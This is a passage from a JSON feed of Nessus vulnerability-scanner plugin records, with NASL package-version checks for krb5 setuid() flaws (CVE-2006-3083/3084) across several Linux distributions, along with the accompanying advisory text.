value:\"p-cpe:/a:oracle:linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"krb5-devel-1.2.7-61\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"krb5-devel-1.2.7-61\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"krb5-libs-1.2.7-61\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"krb5-libs-1.2.7-61\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"krb5-server-1.2.7-61\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"krb5-server-1.2.7-61\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"krb5-workstation-1.2.7-61\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"krb5-workstation-1.2.7-61\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"krb5-devel-1.3.4-46\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"krb5-devel-1.3.4-46\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"krb5-libs-1.3.4-46\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"krb5-libs-1.3.4-46\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"krb5-server-1.3.4-46\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"krb5-server-1.3.4-46\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"krb5-workstation-1.3.4-46\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"krb5-workstation-1.3.4-46\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"krb5-devel-1.5-23\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"krb5-libs-1.5-23\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"krb5-server-1.5-23\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"krb5-workstation-1.5-23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:18", "description": "In certain application programs packaged in the MIT Kerberos 5 source distribution, calls to setuid() and seteuid() are not always checked for success and may fail with some PAM configurations. A local user could exploit one of these vulnerabilities to result in privilege escalation. No exploit code is known to exist at this time.", "cvss3": {}, "published": "2006-10-14T00:00:00", "type": "nessus", "title": "Debian DSA-1146-1 : krb5 - programming error", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:krb5", "cpe:/o:debian:debian_linux:3.1"], "id": "DEBIAN_DSA-1146.NASL", "href": "https://www.tenable.com/plugins/nessus/22688", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1146. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22688);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n script_xref(name:\"CERT\", value:\"401660\");\n script_xref(name:\"CERT\", value:\"580124\");\n script_xref(name:\"DSA\", value:\"1146\");\n\n script_name(english:\"Debian DSA-1146-1 : krb5 - programming error\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In certain application programs packaged in the MIT Kerberos 5 source\ndistribution, calls to setuid() and seteuid() are not always checked\nfor success and may fail with some PAM configurations. A local user\ncould exploit one of these vulnerabilities to result in privilege\nescalation. No exploit code is known to exist at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1146\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the krb5 packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"krb5-admin-server\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-clients\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-doc\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-ftpd\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-kdc\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-rsh-server\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-telnetd\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"krb5-user\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkadm55\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkrb5-dev\", reference:\"1.3.6-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libkrb53\", reference:\"1.3.6-2sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:00:54", "description": "Various return checks of setuid() and seteuid() calls have been fixed in kerberos client and server applications.\n\nIf these applications are setuid, it might have been possible for local attackers to gain root access (CVE-2006-3083).\n\nWe are not affected by the seteuid() problems, tracked by CVE-2006-3084.", "cvss3": {}, "published": "2007-10-17T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : krb5-apps-clients (krb5-apps-clients-1937)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:krb5-apps-clients", "p-cpe:/a:novell:opensuse:krb5-apps-servers", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_KRB5-APPS-CLIENTS-1937.NASL", "href": "https://www.tenable.com/plugins/nessus/27312", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update krb5-apps-clients-1937.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27312);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n\n script_name(english:\"openSUSE 10 Security Update : krb5-apps-clients (krb5-apps-clients-1937)\");\n script_summary(english:\"Check for the krb5-apps-clients-1937 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various return checks of setuid() and seteuid() calls have been fixed\nin kerberos client and server applications.\n\nIf these applications are setuid, it might have been possible for\nlocal attackers to gain root access (CVE-2006-3083).\n\nWe are not affected by the seteuid() problems, tracked by\nCVE-2006-3084.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected krb5-apps-clients packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-apps-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-apps-servers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-apps-clients-1.4.3-19.5\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-apps-servers-1.4.3-19.5\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:12", "description": "Michael Calmer and Marcus Meissner discovered that several krb5 tools did not check the return values from setuid() system calls. On systems that have configured user process limits, it may be possible for an attacker to cause setuid() to fail via resource starvation. In that situation, the tools will not reduce their privilege levels, and will continue operation as the root user.\n\nBy default, Ubuntu does not ship with user process limits.\n\nPlease note that these packages are not officially supported by Ubuntu (they are in the 'universe' component of the archive).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2007-11-10T00:00:00", "type": "nessus", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : krb5 vulnerabilities (USN-334-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:krb5-admin-server", "p-cpe:/a:canonical:ubuntu_linux:krb5-clients", "p-cpe:/a:canonical:ubuntu_linux:krb5-doc", "p-cpe:/a:canonical:ubuntu_linux:krb5-ftpd", "p-cpe:/a:canonical:ubuntu_linux:krb5-kdc", "p-cpe:/a:canonical:ubuntu_linux:krb5-rsh-server", "p-cpe:/a:canonical:ubuntu_linux:krb5-telnetd", "p-cpe:/a:canonical:ubuntu_linux:krb5-user", "p-cpe:/a:canonical:ubuntu_linux:libkadm55", "p-cpe:/a:canonical:ubuntu_linux:libkrb5-dev", "p-cpe:/a:canonical:ubuntu_linux:libkrb53", "cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:5.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-334-1.NASL", "href": "https://www.tenable.com/plugins/nessus/27913", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-334-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27913);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n script_bugtraq_id(19427);\n script_xref(name:\"USN\", value:\"334-1\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : krb5 vulnerabilities (USN-334-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Michael Calmer and Marcus Meissner discovered that several krb5 tools\ndid not check the return values from setuid() system calls. On systems\nthat have configured user process limits, it may be possible for an\nattacker to cause setuid() to fail via resource starvation. In that\nsituation, the tools will not reduce their privilege levels, and will\ncontinue operation as the root user.\n\nBy default, Ubuntu does not ship with user process limits.\n\nPlease note that these packages are not officially supported by Ubuntu\n(they are in the 'universe' component of the archive).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/334-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-admin-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-ftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-kdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-rsh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-telnetd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkadm55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb53\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-admin-server\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-clients\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-doc\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-ftpd\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-kdc\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-rsh-server\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-telnetd\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-user\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkadm55\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkrb5-dev\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkrb53\", pkgver:\"1.3.6-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-admin-server\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-clients\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-doc\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-ftpd\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-kdc\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-rsh-server\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-telnetd\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-user\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkadm55\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkrb5-dev\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkrb53\", pkgver:\"1.3.6-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-admin-server\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-clients\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-doc\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-ftpd\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-kdc\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-rsh-server\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-telnetd\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-user\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkadm55\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkrb5-dev\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkrb53\", pkgver:\"1.4.3-5ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-admin-server / krb5-clients / krb5-doc / krb5-ftpd / krb5-kdc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:34", "description": "A flaw was discovered in some bundled Kerberos-aware packages that would fail to check the results of the setuid() call. This call can fail in some circumstances on the Linux 2.6 kernel if certain user limits are reached, which could be abused by a local attacker to get the applications to continue to run as root, possibly leading to an elevation of privilege.\n\nUpdated packages have been patched to correct this issue.", "cvss3": {}, "published": "2006-12-16T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : krb5 (MDKSA-2006:139)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:ftp-client-krb5", "p-cpe:/a:mandriva:linux:ftp-server-krb5", "p-cpe:/a:mandriva:linux:krb5-server", "p-cpe:/a:mandriva:linux:krb5-workstation", "p-cpe:/a:mandriva:linux:lib64krb53", "p-cpe:/a:mandriva:linux:lib64krb53-devel", "p-cpe:/a:mandriva:linux:libkrb53", "p-cpe:/a:mandriva:linux:libkrb53-devel", "p-cpe:/a:mandriva:linux:telnet-client-krb5", "p-cpe:/a:mandriva:linux:telnet-server-krb5", "cpe:/o:mandriva:linux:2006"], "id": "MANDRAKE_MDKSA-2006-139.NASL", "href": "https://www.tenable.com/plugins/nessus/23888", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:139. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(23888);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n script_bugtraq_id(19427);\n script_xref(name:\"MDKSA\", value:\"2006:139\");\n\n script_name(english:\"Mandrake Linux Security Advisory : krb5 (MDKSA-2006:139)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was discovered in some bundled Kerberos-aware packages that\nwould fail to check the results of the setuid() call. This call can\nfail in some circumstances on the Linux 2.6 kernel if certain user\nlimits are reached, which could be abused by a local attacker to get\nthe applications to continue to run as root, possibly leading to an\nelevation of privilege.\n\nUpdated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 